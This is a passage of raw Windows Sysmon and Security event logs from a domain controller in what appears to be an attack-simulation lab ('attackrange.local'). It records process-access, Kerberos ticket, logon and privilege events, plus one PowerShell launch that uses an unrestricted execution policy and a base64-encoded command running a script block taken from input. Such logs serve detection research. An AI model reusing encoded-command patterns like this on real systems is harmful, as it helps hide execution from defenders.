07:59:19.440","ProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_l4xcpdlk.un3.ps1","CreationUtcTime":"2020-08-01 07:59:19.440","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.471\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.471","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.534\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.534","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220644,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220645,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220646,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220647,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8FD1D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8fd1d","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220648,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8FD1D\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8fd1d","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.541\r\nProcessGuid: {41C8662E-20D7-5F25-0000-00102FFD0800}\r\nProcessId: 668\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nParentProcessId: 3496\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.541","ProcessGuid":"{41C8662E-20D7-5F25-0000-00102FFD0800}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","ParentProcessId":"3496","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 